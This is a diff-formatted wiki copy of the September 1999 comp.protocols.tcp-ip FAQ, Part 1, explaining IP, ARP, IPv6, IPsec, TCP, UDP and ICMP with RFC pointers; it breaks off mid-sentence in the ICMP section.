||||
Posting-Frequency: monthly (first Friday)
|
||||
Maintainer: tcp-ip-faq@eng.sun.com (Mike Oliver)
|
||||
URL: http://www.itprc.com/tcpipfaq/default.htm
|
||||
|
||||
TCP/IP Frequently Asked Questions
|
||||
Table of Contents
|
||||
|
||||
This is the Table of Contents for the Frequently Asked Questions (FAQ) list for the comp.protocols.tcp-ip Usenet newsgroup. The FAQ provides answers to a selection of common questions on the various protocols (IP, TCP, UDP, ICMP and others) that make up the TCP/IP protocol suite. It is posted to the news.answers, comp.answers and comp.protocols.tcp-ip newsgroups on or about the first Friday of every month.
|
||||
|
||||
The FAQ is posted in two parts. Part 1 contains answers to general questions and questions that concern the fundamental components of the suite. Part 2 contains answers to questions concerning common applications that depend on the TCP/IP suite for their network connectivity.
|
||||
|
||||
Comments on this document can be emailed to the FAQ maintainer at <tcp-ip-faq@eng.sun.com>.
|
||||
FAQ Part 1: Introduction and Fundamental Protocols
|
||||
Administrivia
|
||||
|
||||
Where can I find an up-to-date copy of this FAQ?
|
||||
Who wrote this FAQ?
|
||||
|
||||
About TCP/IP
|
||||
|
||||
What is TCP/IP?
|
||||
How is TCP/IP defined?
|
||||
Where can I find RFC's?
|
||||
How do I find the right RFC?
|
||||
|
||||
About IP
|
||||
|
||||
What is IP?
|
||||
How is IP carried on a network?
|
||||
Does IP Protect Data on the Network?
|
||||
What is ARP?
|
||||
What is IPv6?
|
||||
What happened to IPv5?
|
||||
What is the 6bone?
|
||||
What is the MBONE?
|
||||
What is IPsec?
|
||||
|
||||
About TCP
|
||||
|
||||
What is TCP?
|
||||
How does TCP try to avoid network meltdown?
|
||||
How do applications coexist over TCP and UDP?
|
||||
Where do I find assigned port numbers?
|
||||
|
||||
About UDP
|
||||
|
||||
What is UDP?
|
||||
|
||||
About ICMP
|
||||
|
||||
What is ICMP?
|
||||
|
||||
TCP/IP Network Operations
|
||||
|
||||
How can I measure the performance of an IP link?
|
||||
What IP addresses should I assign to machines on a private internet?
|
||||
Can I set up a gateway to the Internet that translates IP addresses, so that I don't have to change all our internal addresses to an official network?
|
||||
Can I use a single bit subnet?
|
||||
|
||||
TCP/IP Protocol Implementations
|
||||
|
||||
Where can I find TCP/IP source code?
|
||||
Where can I find TCP/IP application source code?
|
||||
Where can I find IPv6 source code?
|
||||
|
||||
Further Sources of Information
|
||||
|
||||
What newsgroups deal with TCP/IP?
|
||||
Are there any good books on TCP/IP?
|
||||
|
||||
FAQ Part 2 -- Applications and Application Programming
|
||||
What Are The Common TCP/IP Application Protocols?
|
||||
|
||||
DHCP
|
||||
DNS
|
||||
FTP
|
||||
HTTP
|
||||
IMAP
|
||||
NFS
|
||||
NNTP
|
||||
NTP
|
||||
POP
|
||||
Rlogin
|
||||
Rsh
|
||||
SMTP
|
||||
SNMP
|
||||
Ssh
|
||||
Telnet
|
||||
X Window System
|
||||
|
||||
TCP/IP Programming
|
||||
|
||||
What are sockets?
|
||||
How can I detect that the other end of a TCP connection has crashed?
|
||||
Can TCP keepalive timeouts be configured?
|
||||
Are there object-oriented network programming tools?
|
||||
@@ -0,0 +1,990 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:35:35+08:00
|
||||
|
||||
====== Frequently Asked Questions (1999-09) Part 1 of 2 ======
|
||||
Created 星期二 07 六月 2011
|
||||
|
||||
From: tcp-ip-faq@eng.sun.com (TCP/IP FAQ Maintainer)
|
||||
Newsgroups: comp.protocols.tcp-ip
|
||||
Subject: TCP/IP FAQ; Frequently Asked Questions (1999-09) Part 1 of 2
|
||||
Date: 7 Sep 1999 03:36:53 GMT
|
||||
Message-ID: <tcp-ip-faq-1.1999-09@eng.sun.com>
|
||||
Summary: Part 1 of a 2-part informational posting that contains
|
||||
responses to common questions on basic TCP/IP network
|
||||
protocols and applications.
|
||||
X-Disclaimer: Approval for postings in *.answers is based on form, not content.
|
||||
|
||||
Archive-name: internet/tcp-ip/tcp-ip-faq/part1
|
||||
Version: 5.15
|
||||
Last-modified: 1999-09-06 20:11:43
|
||||
Posting-Frequency: monthly (first Friday)
|
||||
Maintainer: tcp-ip-faq@eng.sun.com (Mike Oliver)
|
||||
URL: http://www.itprc.com/tcpipfaq/default.htm
|
||||
|
||||
TCP/IP Frequently Asked Questions
|
||||
|
||||
Part 1: Introduction and Fundamental Protocols
|
||||
|
||||
This is Part 1 of the Frequently Asked Questions (FAQ) list for the
|
||||
comp.protocols.tcp-ip Usenet newsgroup. The FAQ provides answers to a
|
||||
selection of common questions on the various protocols (IP, TCP, UDP,
|
||||
ICMP and others) that make up the TCP/IP protocol suite. It is posted
|
||||
to the news.answers, comp.answers and comp.protocols.tcp-ip newsgroups
|
||||
on or about the first Friday of every month.
|
||||
|
||||
The FAQ is posted in two parts. Part 1 contains answers to general
|
||||
questions and questions that concern the fundamental components of the
|
||||
suite. Part 2 contains answers to questions concerning common
|
||||
applications that depend on the TCP/IP suite for their network
|
||||
connectivity.
|
||||
|
||||
Comments on this document can be emailed to the FAQ maintainer at
|
||||
<tcp-ip-faq@eng.sun.com>.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
Table of Contents
|
||||
|
||||
FAQ Part 1: Introduction and Fundamental Protocols
|
||||
|
||||
Administrivia
|
||||
|
||||
1. Where can I find an up-to-date copy of this FAQ?
|
||||
2. Who wrote this FAQ?
|
||||
|
||||
About TCP/IP
|
||||
|
||||
1. What is TCP/IP?
|
||||
2. How is TCP/IP defined?
|
||||
3. Where can I find RFC's?
|
||||
4. How do I find the right RFC?
|
||||
|
||||
About IP
|
||||
|
||||
1. What is IP?
|
||||
2. How is IP carried on a network?
|
||||
3. Does IP Protect Data on the Network?
|
||||
4. What is ARP?
|
||||
5. What is IPv6?
|
||||
6. What happened to IPv5?
|
||||
7. What is the 6bone?
|
||||
8. What is the MBONE?
|
||||
9. What is IPsec?
|
||||
|
||||
About TCP
|
||||
|
||||
1. What is TCP?
|
||||
2. How does TCP try to avoid network meltdown?
|
||||
3. How do applications coexist over TCP and UDP?
|
||||
4. Where do I find assigned port numbers?
|
||||
|
||||
About UDP
|
||||
|
||||
1. What is UDP?
|
||||
|
||||
About ICMP
|
||||
|
||||
1. What is ICMP?
|
||||
|
||||
TCP/IP Network Operations
|
||||
|
||||
1. How can I measure the performance of an IP link?
|
||||
2. What IP addresses should I assign to machines on a private
|
||||
internet?
|
||||
3. Can I set up a gateway to the Internet that translates IP
|
||||
addresses, so that I don't have to change all our internal
|
||||
addresses to an official network?
|
||||
4. Can I use a single bit subnet?
|
||||
|
||||
TCP/IP Protocol Implementations
|
||||
|
||||
1. Where can I find TCP/IP source code?
|
||||
2. Where can I find TCP/IP application source code?
|
||||
3. Where can I find IPv6 source code?
|
||||
|
||||
Further Sources of Information
|
||||
|
||||
1. What newsgroups deal with TCP/IP?
|
||||
2. Are there any good books on TCP/IP?
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
Administrivia
|
||||
|
||||
1. Where can I find an up-to-date copy of this FAQ?
|
||||
|
||||
You can browse a hyperlinked version of this FAQ on the World Wide
|
||||
Web at <http://www.itprc.com/tcpipfaq/default.htm> in the US
|
||||
(thanks to Irwin Lazar) and at
|
||||
<http://t2.technion.ac.il/~s2845543/tcpip-faq/default.htm> in
|
||||
Israel (thanks to Uri Raz). Links to RFC's from Irwin's site refer
|
||||
to the ISI RFC repository in the US, while links to RFC's from
|
||||
Uri's site refer to the RFC repository at Imperial College in the
|
||||
UK. Use whichever gives you better response time.
|
||||
|
||||
The current version of this FAQ is posted on a monthly basis to
|
||||
the news.answers, comp.answers and comp.protocols.tcp-ip
|
||||
newsgroups.
|
||||
|
||||
A plaintext copy of the most recently posted version of the FAQ is
|
||||
available by anonymous FTP from
|
||||
<ftp://rtfm.mit.edu/pub/faqs/internet/tcp-ip/tcp-ip-faq/>.
|
||||
|
||||
2. Who wrote this FAQ?
|
||||
|
||||
This FAQ was compiled from Usenet postings and email contributions
|
||||
made by many people, including: Rui Duarte Tavares Bastos, Mark
|
||||
Bergman, Stephane Bortzmeyer, Rodney Brown, Dr. Charles E.
|
||||
Campbell Jr., James Carlson, Phill Conrad, Alan Cox, Michael
|
||||
Hunter, Jay Kreibrich, William Manning, Barry Margolin, Vic
|
||||
Metcalfe, Jim Muchow, George V. Neville-Neil, Dang Thanh Ngan,
|
||||
Subu Rama, Uri Raz, and W. Richard Stevens.
|
||||
|
||||
The FAQ is currently maintained by Mike Oliver. Comments,
|
||||
criticisms and contributions should be mailed to
|
||||
<tcp-ip-faq@eng.sun.com>. Please do not send TCP/IP questions to
|
||||
this address; it is intended only for FAQ issues. If you have a
|
||||
question that is not already answered by the material in this FAQ
|
||||
you will get a much faster (and probably more accurate) response
|
||||
by posting the question to the comp.protocols.tcp-ip newsgroup
|
||||
than you will by sending it to the FAQ maintainer.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
About TCP/IP
|
||||
|
||||
1. What is TCP/IP?
|
||||
|
||||
TCP/IP is a name given to the collection (or suite) of networking
|
||||
protocols that have been used to construct the global Internet.
|
||||
The protocols are also referred to as the DoD (dee-oh-dee) or
|
||||
Arpanet protocol suite because their early development was funded
|
||||
by the Advanced Research Projects Agency (ARPA) of the US
|
||||
Department of Defense (DoD).
|
||||
|
||||
The TCP/IP name is taken from two of the fundamental protocols in
|
||||
the collection, IP and TCP. Other core protocols in the suite are
|
||||
UDP and ICMP. These protocols work together to provide a basic
|
||||
networking framework that is used by many different application
|
||||
protocols, each tuned to achieving a particular goal.
|
||||
|
||||
TCP/IP protocols are not used only on the Internet. They are also
|
||||
widely used to build private networks, called internets (spelled
|
||||
with a small 'i'), that may or may not be connected to the global
|
||||
Internet (spelled with a capital 'I'). An internet that is used
|
||||
exclusively by one organization is sometimes called an intranet.
|
||||
|
||||
2. How is TCP/IP defined?
|
||||
|
||||
All of the protocols in the TCP/IP suite are defined by documents
|
||||
called Requests For Comments (RFC's). An important difference
|
||||
between TCP/IP RFC's and other (say, IEEE or ITU) networking
|
||||
standards is that RFC's are freely available online.
|
||||
|
||||
RFC's can be composed and submitted for approval by anyone.
|
||||
Standards RFC's are often the product of many weeks or months of
|
||||
discussion between interested parties designated as working
|
||||
groups, during which time drafts of the proposed RFC are
|
||||
continually updated and made available for comment. These
|
||||
discussions typically take place on open mailing lists which
|
||||
welcome input from all quarters. The RFC approval process is
|
||||
managed by the Internet Engineering Steering Group (IESG) based on
|
||||
recommendations from the Internet Engineering Task Force (IETF)
|
||||
which is a prime mover in the formation of working groups focused
|
||||
on strategic TCP/IP issues. You can find out more about IESG and
|
||||
IETF activities from the IETF home page at
|
||||
<http://www.ietf.org/>.
|
||||
|
||||
Not all RFC's specify TCP/IP standards. Some RFC's contain
|
||||
background information, some provide hints for managing an
|
||||
internet, some document protocol weaknesses in the hope that they
|
||||
might be addressed by future standards, and some are entirely
|
||||
humorous.
|
||||
|
||||
3. Where can I find RFC's?
|
||||
|
||||
The Definitive RFC Repository
|
||||
|
||||
The official and definitive RFC repository is the anonymous FTP
|
||||
archive maintained by the Information Sciences Institute of the
|
||||
University of Southern California at <ftp://ftp.isi.edu/in-notes>.
|
||||
It is reachable via the Web at <http://www.rfc-editor.org/>.
|
||||
|
||||
RFC Repository Mirror Sites
|
||||
|
||||
The RFC repository is mirrored at many sites on the Internet, and
|
||||
you may get a faster response from a local archive than you would
|
||||
from the often-overworked ISI site. Primary mirrors are updated at
|
||||
the same time as the ISI site. Secondary mirrors may lag by a few
|
||||
hours or days. The current primary mirror sites are:
|
||||
|
||||
In the USA ...
|
||||
|
||||
Missouri:
|
||||
<ftp://wuarchive.wustl.edu/doc/rfc>
|
||||
New Jersey:
|
||||
<ftp://nisc.jvnc.net/>
|
||||
North Carolina:
|
||||
<ftp://ftp.ncren.net/rfc>
|
||||
Texas:
|
||||
<ftp://ftp.sesqui.net/pub/>
|
||||
|
||||
In Europe ...
|
||||
|
||||
France:
|
||||
<ftp://ftp.imag.fr/pub/archive/IETF/rfc>
|
||||
Italy:
|
||||
<ftp://ftp.nic.it/rfc>
|
||||
UK:
|
||||
<ftp://src.doc.ic.ac.uk/rfc>
|
||||
|
||||
Secondary mirror sites are listed in a document named
|
||||
rfc-retrieval.txt which can be found alongside the RFC's
|
||||
themselves at any of the above sites.
|
||||
|
||||
RFC's by Email
|
||||
|
||||
If you don't have direct access to the Internet but are able to
|
||||
send and receive email then you can still get RFC's through
|
||||
various email-to-ftp gateways. For instructions on how to do this,
|
||||
send email containing the text:
|
||||
|
||||
help: ways_to_get_rfcs
|
||||
|
||||
to <rfc-info@isi.edu>.
|
||||
|
||||
4. How do I find the right RFC?
|
||||
|
||||
There are over 2500 RFC's. Each RFC is known by a number. For
|
||||
instance, RFC 1180 presents a tutorial on TCP/IP, RFC 1920 lists
|
||||
the current standards RFC's and explains the RFC standards
|
||||
process, and RFC 1941 is a FAQ list on the topic of Internet
|
||||
deployment in educational establishments. RFC numbers are assigned
|
||||
in ascending order as each RFC is approved.
|
||||
|
||||
The RFC files in the archive are named rfcNNNN.txt where NNNN is
|
||||
the number of the RFC. For instance, the text of RFC 822 is
|
||||
contained in the file named rfc822.txt. A small number of RFC's
|
||||
are also available in PostScript format, in which case a file
|
||||
named rfcNNNN.ps will exist in addition to the .txt file.
|
||||
|
||||
Basic information (number, title, author, publication date and so
|
||||
on) on all of the RFC's is contained in the RFC index document
|
||||
named rfc-index.txt which you can find alongside the RFC's at any
|
||||
of the RFC archive sites. If you don't know which RFC's you need,
|
||||
the index is a good place to start. The index also indicates the
|
||||
current status of each RFC. The content of an RFC does not change
|
||||
once the RFC has been published, but since TCP/IP is in a constant
|
||||
state of evolution the information in one RFC is often revised,
|
||||
extended, clarified and in some cases completely superseded by
|
||||
later RFC's. Annotations in the index indicate when this is the
|
||||
case.
|
||||
|
||||
If you find yourself using the index a lot then you might find it
|
||||
convenient to create your own HTML version of the index. Wayne
|
||||
Mesard has published a Perl script that takes the plaintext index
|
||||
file as input and produces an HTML version with hyperlinks to your
|
||||
chosen RFC FTP repository or to your own local RFC archive. The
|
||||
script is available at
|
||||
<ftp://ftp.ibnets.com/pub/wmesard/>.
|
||||
|
||||
If you don't want to wade through the index, some sites provide
|
||||
the ability to search the RFC catalogue by keyword:
|
||||
|
||||
Keyword Searches on the Web
|
||||
<http://www.faqs.org/rfcs/> lets you search on RFC content.
|
||||
<http://web.nexor.co.uk/public/rfc/index/rfc.html> and
|
||||
<http://www.csl.sony.co.jp/rfc/> let you search on words in the
|
||||
RFC title.
|
||||
Keyword Searches via gopher
|
||||
<gopher://r2d2.jvnc.net/11/Internet%20Resources/RFC> or
|
||||
<gopher://muspin.gsfc.nasa.gov:4320/1g2go4%20ds.internic.net%2070%201%201/.ds/.internetdocs>
|
||||
RFC Keyword Searches via WAIS
|
||||
<wais://wais.cnam.fr/RFC>
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
About IP
|
||||
|
||||
1. What is IP?
|
||||
|
||||
Internet Protocol (IP) is the central, unifying protocol in the
|
||||
TCP/IP suite. It provides the basic delivery mechanism for packets
|
||||
of data sent between all systems on an internet, regardless of
|
||||
whether the systems are in the same room or on opposite sides of
|
||||
the world. All other protocols in the TCP/IP suite depend on IP to
|
||||
carry out the fundamental function of moving packets across the
|
||||
internet.
|
||||
|
||||
In terms of the OSI networking model, IP provides a Connectionless
|
||||
Unacknowledged Network Service, which means that its attitude to
|
||||
data packets can be characterised as "send and forget". IP does
|
||||
not guarantee to actually deliver the data to the destination, nor
|
||||
does it guarantee that the data will be delivered undamaged, nor
|
||||
does it guarantee that data packets will be delivered to the
|
||||
destination in the order in which they were sent by the source,
|
||||
nor does it guarantee that only one copy of the data will be
|
||||
delivered to the destination.
|
||||
|
||||
Because it makes so few guarantees, IP is a very simple protocol.
|
||||
This means that it can be implemented fairly easily and can run on
|
||||
systems that have modest processing power and small amounts of
|
||||
memory. It also means that IP demands only minimal functionality
|
||||
from the underlying medium (the physical network that carries
|
||||
packets on behalf of IP) and can be deployed on a wide variety of
|
||||
networking technologies.
|
||||
|
||||
The no-promises type of service offered by IP is not directly
|
||||
useful to many applications. Applications usually depend on TCP or
|
||||
UDP to provide assurances of of data integrity and (in TCP's case)
|
||||
ordered and complete data delivery.
|
||||
|
||||
The fundamentals of IP are defined in RFC 791. RFC 1122 summarises
|
||||
the requirements that must be met by an IP implementation in an
|
||||
Internet host, and RFC 1812 summarises the IP requirements for an
|
||||
Internet router.
|
||||
|
||||
2. How Is IP Carried On A Network?
|
||||
|
||||
IP really isn't very fussy about how its packets are transported.
|
||||
The details of how an IP packet is carried over a particular kind
|
||||
of network are usually chosen to be convenient for the network
|
||||
itself. As long as the transmitter and receiver observe some
|
||||
convention that allows IP packets to be differentiated from any
|
||||
other data that might be seen by the receiver, then IP can be used
|
||||
to carry data between those stations.
|
||||
|
||||
On a LAN, IP is carried in the data portion of the LAN frame and
|
||||
the frame header contains additional information that identifies
|
||||
the frame an an IP frame. Different LAN's have different
|
||||
conventions for carrying that additional information. On an
|
||||
Ethernet the Ethertype field is used; a value of 0x0800 identifies
|
||||
a frame that contains IP data. FDDI and Token Ring use frames that
|
||||
conform to IEEE 802 Logical Link Control, and on those LAN's IP is
|
||||
carried in Unnumbered Information frames with Source and
|
||||
Destination LSAP's of 0xAA and a SNAP header of 00-00-00-08-00.
|
||||
|
||||
The only thing that IP cares strongly about is the maximum size of
|
||||
a frame that can be carried on the medium. This controls whether,
|
||||
and to what extent, IP must break down large data packets into a
|
||||
train of smaller packets before arranging for them to be
|
||||
transmitted on the medium. This activity is called "fragmentation"
|
||||
and the resulting smaller and incomplete packets are called
|
||||
"fragments". The final destination is responsible for rebuilding
|
||||
the original IP packet from its fragments, an activity called
|
||||
"fragment reassembly".
|
||||
|
||||
3. Does IP Protect Data On The Network?
|
||||
|
||||
IP itself does not guarantee to deliver data correctly. It leaves
|
||||
all issues of data protection to the transport protocol. Both TCP
|
||||
and UDP have mechanisms that guarantee that the data they deliver
|
||||
to an application is correct.
|
||||
|
||||
IP does try to protect the packet's IP header, the relatively
|
||||
small part of each packet that controls how the packet is moved
|
||||
through the network. It does this by calculating a checksum on the
|
||||
header fields and including that checksum in the transmitted
|
||||
packet. The receiver verifies the IP header checksum before
|
||||
processing the packet. Packets whose checksums no longer match
|
||||
have been damaged in some way and are simply discarded.
|
||||
|
||||
The IP checksum is discussed in detail in RFC 1071, which also
|
||||
includes sample code for calculating the checksum. RFC 1141 and
|
||||
RFC 1624 describe incremental modification of an existing
|
||||
checksum, which can be useful in machines such as routers which
|
||||
modify fields in the IP header while forwarding a packet and
|
||||
therefore need to compute a new header checksum.
|
||||
|
||||
The same checksum algorithm is used by TCP and UDP, although they
|
||||
include the data portion of the packet (not just the header) in
|
||||
their calculations.
|
||||
|
||||
4. What is ARP?
|
||||
|
||||
Address Resolution Protocol (ARP) is a mechanism that can be used
|
||||
by IP to find the link-layer station address that corresponds to a
|
||||
particular IP address. It defines a method that is used to ask,
|
||||
and answer, the question "what MAC address corresponds to a given
|
||||
IP address?". ARP sends broadcast frames to obtain this
|
||||
information dynamically, so it can only be used on media that
|
||||
support broadcast frames. Most LAN's (including Ethernet, FDDI,
|
||||
and Token Ring) have a broadcast capability and ARP is used when
|
||||
IP is running on those media. ARP is defined in RFC 826. That
|
||||
definition assumes an Ethernet LAN. Additional details for ARP on
|
||||
networks that use IEEE 802.2 frame formats (IEEE 802.3 CSMA/CD,
|
||||
IEEE 802.4, IEEE 802.5 Token Ring) are in RFC 1042. ARP on FDDI is
|
||||
described in RFC 1390.
|
||||
|
||||
When IP is runnning over non-broadcast media (say, X.25 or ATM)
|
||||
some other mechanism is used to match IP addresses to media
|
||||
addresses. IP really doesn't care how the media address is
|
||||
obtained.
|
||||
|
||||
RFC 903 defines Reverse ARP (RARP) which lets a station ask the
|
||||
question "which IP address corresponds to a given MAC address?".
|
||||
RARP is typically used to let a piece of diskless equipment
|
||||
discover its own IP address as part of its boot procedure. RARP is
|
||||
rarely used by modern equipment; it has been supplanted by the
|
||||
Boot Protocol (BOOTP) defined in RFC 1542. BOOTP in turn is being
|
||||
supplanted by the Dynamic Host Configuration Protocol (DHCP).
|
||||
|
||||
5. What is IPv6?
|
||||
|
||||
IP Version 6 (IPv6) is the newest version of IP, sometimes called
|
||||
IPng for "IP, Next Generation". IPv6 is fairly well defined but is
|
||||
not yet widely deployed. The main differences between IPv6 and the
|
||||
current widely-deployed version of IP (which is IPv4) are:
|
||||
|
||||
o IPv6 uses larger addresses (128 bits instead of 32 bits in
|
||||
IPv4) and so can support many more devices on the network,
|
||||
and
|
||||
|
||||
o IPv6 includes features like authentication and multicasting
|
||||
that had been bolted on to IPv4 in a piecemeal fashion over
|
||||
the years.
|
||||
|
||||
Information on IPv6 can be found on the IPv6 home page at
|
||||
<http://playground.sun.com/pub/ipng/html/ipng-main.html>
|
||||
|
||||
6. What happened to IPv5?
|
||||
|
||||
Or, ""Why are we skipping from IPv4 to IPv6?"
|
||||
|
||||
IPv5 never existed. The version number "5" in the IP header was
|
||||
assigned to identify packets carrying an experimental non-IP
|
||||
real-time stream protocol called ST. ST was never widely used, but
|
||||
since the version number 5 had already been allocated the new
|
||||
version of IP was given its own unique identifying number, 6. ST
|
||||
is described in RFC 1819.
|
||||
|
||||
7. What is the 6bone?
|
||||
|
||||
The 6bone is the experimental IPv6 backbone being developed using
|
||||
IPv6-in-IPv4 tunnels. This is intended for early experimentation
|
||||
with IPv6 and is not a production service.
|
||||
|
||||
8. What is the MBONE?
|
||||
|
||||
The Multicast backBONE (MBONE) is a multicast-capable portion of
|
||||
the Internet backbone. Multicast support over IP is provided by a
|
||||
protocol called IGMP (Internet Group Management Protocol) which is
|
||||
defined in RFC 1112. The MBONE is still a research prototype, but
|
||||
it extends through most of the core of the Internet (including
|
||||
North America, Europe, and Australia). It is typically used to
|
||||
relay multimedia (audio and low bandwidth video) presentations
|
||||
from a single source to multiple receiving sites dispersed over
|
||||
the Internet.
|
||||
|
||||
A slightly dated MBONE FAQ is available by anonymous FTP from
|
||||
<ftp://ftp.isi.edu/mbone/faq.txt>.
|
||||
|
||||
9. What is IPsec?
|
||||
|
||||
IPsec stands for "IP Security". The IPsec working group of the
|
||||
IETF is developing standards for cryptographic authentication and
|
||||
for encryption within IP. The base specifications are defined in
|
||||
RFC's 1825, 1826 and 1827. Products that implement these are
|
||||
beginning to appear.
|
||||
|
||||
A freely distributable implementation of IPsec for IPv4 and IPsec
|
||||
for IPv6 is included in the NRL IPv6/IPsec distribution for
|
||||
4.4-Lite BSD. The NRL software is available from
|
||||
<http://web.mit.edu/network/isakmp/> (for distribution within the
|
||||
US only), from
|
||||
<http://www.cisco.com/public/library/isakmp/ipsec.html> (for
|
||||
distribution within the US and Canada), and from
|
||||
<ftp://ftp.ripe.net/ipv6/nrl/> (for unrestricted distribution).
|
||||
|
||||
(Some countries consider encryption software to have military
|
||||
significance and so restrict the export and import of such
|
||||
software, which is why there are geographical restrictions on the
|
||||
areas served by the above sites.)
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
About TCP
|
||||
|
||||
1. What is TCP?
|
||||
|
||||
Transmission Control Protocol (TCP) provides a reliable
|
||||
byte-stream transfer service between two endpoints on an internet.
|
||||
TCP depends on IP to move packets around the network on its
|
||||
behalf. IP is inherently unreliable, so TCP protects against data
|
||||
loss, data corruption, packet reordering and data duplication by
|
||||
adding checksums and sequence numbers to transmitted data and, on
|
||||
the receiving side, sending back packets that acknowledge the
|
||||
receipt of data.
|
||||
|
||||
Before sending data across the network, TCP establishes a
|
||||
connection with the destination via an exchange of management
|
||||
packets. The connection is destroyed, again via an exchange of
|
||||
management packets, when the application that was using TCP
|
||||
indicates that no more data will be transferred. In OSI terms, TCP
|
||||
is a Connection-Oriented Acknowledged Transport protocol.
|
||||
|
||||
TCP has a multi-stage flow-control mechanism which continuously
|
||||
adjusts the sender's data rate in an attempt to achieve maximum
|
||||
data throughput while avoiding congestion and subsequent packet
|
||||
losses in the network. It also attempts to make the best use of
|
||||
network resources by packing as much data as possible into a
|
||||
single IP packet, although this behaviour can be overridden by
|
||||
applications that demand immediate data transfer and don't care
|
||||
about the inefficiencies of small network packets.
|
||||
|
||||
The fundamentals of TCP are defined in RFC 793, and later RFC's
|
||||
refine the protocol. RFC 1122 catalogues these refinements as of
|
||||
October 1989 and summarises the requirements that a TCP
|
||||
implementation must meet.
|
||||
|
||||
TCP is still being developed. For instance, RFC 1323 introduces a
|
||||
TCP option that can be useful when traffic is being carried over
|
||||
high-capacity links. It is important that such developments are
|
||||
backwards-compatible. That is, a TCP implementation that supports
|
||||
a new feature must continue to work with older TCP implementations
|
||||
that do not support that feature.
|
||||
|
||||
2. How does TCP try to avoid network meltdown?
|
||||
|
||||
TCP includes several mechanisms that attempt to sustain good data
|
||||
transfer rates while avoiding placing excessive load on the
|
||||
network. TCP's "Slow Start", "Congestion Avoidance", "Fast
|
||||
Retransmit" and "Fast Recovery" algorithms are summarised in RFC
|
||||
2001. TCP also mandates an algorithm that avoids "Silly Window
|
||||
Syndrome" (SWS), an undesirable condition that results in very
|
||||
small chunks of data being transferred between sender and
|
||||
receiver. SWS Avoidance is discussed in RFC 813. The "Nagle
|
||||
Algorithm", which prevents the sending side of TCP from flooding
|
||||
the network with a train of small frames, is described in RFC
|
||||
896.
|
||||
|
||||
Van Jacobson has done significant work on this aspect of TCP's
|
||||
behaviour. The FAQ used to contain a couple of pieces of
|
||||
historically interesting pieces of Van's email concerning an early
|
||||
implementation of congestion avoidance, but in the interests of
|
||||
saving space they've been removed and can instead be obtained by
|
||||
anonymous FTP from the end-to-end mailing list archive at
|
||||
<ftp://ftp.isi.edu/end2end/end2end-1990.mail>. PostScript slides
|
||||
of a presentation on this implementation of congestion avoidance
|
||||
can be obtained by anonymous FTP from
|
||||
<ftp://ftp.ee.lbl.gov/papers/congavoid.ps.Z>.
|
||||
|
||||
That directory contains several other interesting TCP-related
|
||||
papers, including one
|
||||
(<ftp://ftp.ee.lbl.gov/papers/fastretrans.ps>) by Sally Floyd that
|
||||
discusses a algorithm that attempts to give TCP the ability to
|
||||
recover quickly from packet loss in a network.
|
||||
|
||||
3. How do applications coexist over TCP and UDP?
|
||||
|
||||
Each application running over TCP or UDP distinguishes itself from
|
||||
other applications using the service by reserving and using a
|
||||
16-bit port number. Destination and source port numbers are placed
|
||||
in the UDP and TCP headers by the originator of the packet before
|
||||
it is given to IP, and the destination port number allows the
|
||||
packet to be delivered to the intended recipient at the
|
||||
destination system.
|
||||
|
||||
So, a system may have a Telnet server listening for packets on TCP
|
||||
port 23 while an FTP server listens for packets on TCP port 21 and
|
||||
a DNS server listens for packets on port 53. TCP examines the port
|
||||
number in each received frame and uses it to figure out which
|
||||
server gets the data. UDP has its own similar set of port
|
||||
numbers.
|
||||
|
||||
Many servers, like the ones in this example, always listen on the
|
||||
same well-known port number. The actual port number is arbitrary,
|
||||
but is fixed by tradition and by an official allocation or
|
||||
"assignment" of the number by the Internet Assigned Numbers
|
||||
Authority (IANA).
|
||||
|
||||
4. Where do I find assigned port numbers?
|
||||
|
||||
The IANA allocates and keeps track of all kinds of arbitrary
|
||||
numbers used by TCP/IP, including well-known port numbers. The
|
||||
entire collection is published periodically in an RFC called the
|
||||
Assigned Numbers RFC, each of which supersedes the previous one in
|
||||
the series. The current Assigned Numbers RFC is RFC 1700.
|
||||
|
||||
The Assigned Numbers document can also be obtained directly by FTP
|
||||
from the IANA at <ftp://ftp.isi.edu/in-notes/iana/assignments>.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
About UDP
|
||||
|
||||
1. What is UDP?
|
||||
|
||||
User Datagram Protocol (UDP) provides an unreliable packetized
|
||||
data transfer service between endpoints on an internet. UDP
|
||||
depends on IP to move packets around the network on its behalf.
|
||||
|
||||
UDP does not guarantee to actually deliver the data to the
|
||||
destination, nor does it guarantee that data packets will be
|
||||
delivered to the destination in the order in which they were sent
|
||||
by the source, nor does it guarantee that only one copy of the
|
||||
data will be delivered to the destination. UDP does guarantee data
|
||||
integrity, and it does this by adding a checksum to the data
|
||||
before transmission. (Some machines run with UDP checksum
|
||||
generation disabled, in which case data corruption or truncation
|
||||
can go undetected. Very few people think this is a good idea.)
|
||||
|
||||
The fundamentals of UDP are defined in RFC 768. RFC 1122
|
||||
summarises the requirements that a UDP implementation must meet.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
About ICMP
|
||||
|
||||
1. What is ICMP?
|
||||
|
||||
Internet Control Message Protocol (ICMP) defines a small number of
|
||||
messages used for diagnostic and management purposes. ICMP depends
|
||||
on IP to move packets around the network on its behalf.
|
||||
|
||||
The fundamentals of ICMP are defined in RFC 792. RFC 1122
|
||||
summarises the requirements that must be met by an ICMP
|
||||
implementation in an Internet host, and RFC 1812 summarises the
|
||||
ICMP requirements for an Internet router.
|
||||
|
||||
ICMP is basically IP's internal network management protocol and is
|
||||
not intended for use by applications. Two well known exceptions
|
||||
are the ping and traceroute diagnostic utilities:
|
||||
|
||||
o ping sends and receives ICMP "ECHO" packets, where the
|
||||
response packet can be taken as evidence that the target host
|
||||
is at least minimally active on the network, and
|
||||
|
||||
o traceroute sends UDP packets and infers the route taken to
|
||||
the target from ICMP "TIME-TO-LIVE EXCEEDED" or "PORT
|
||||
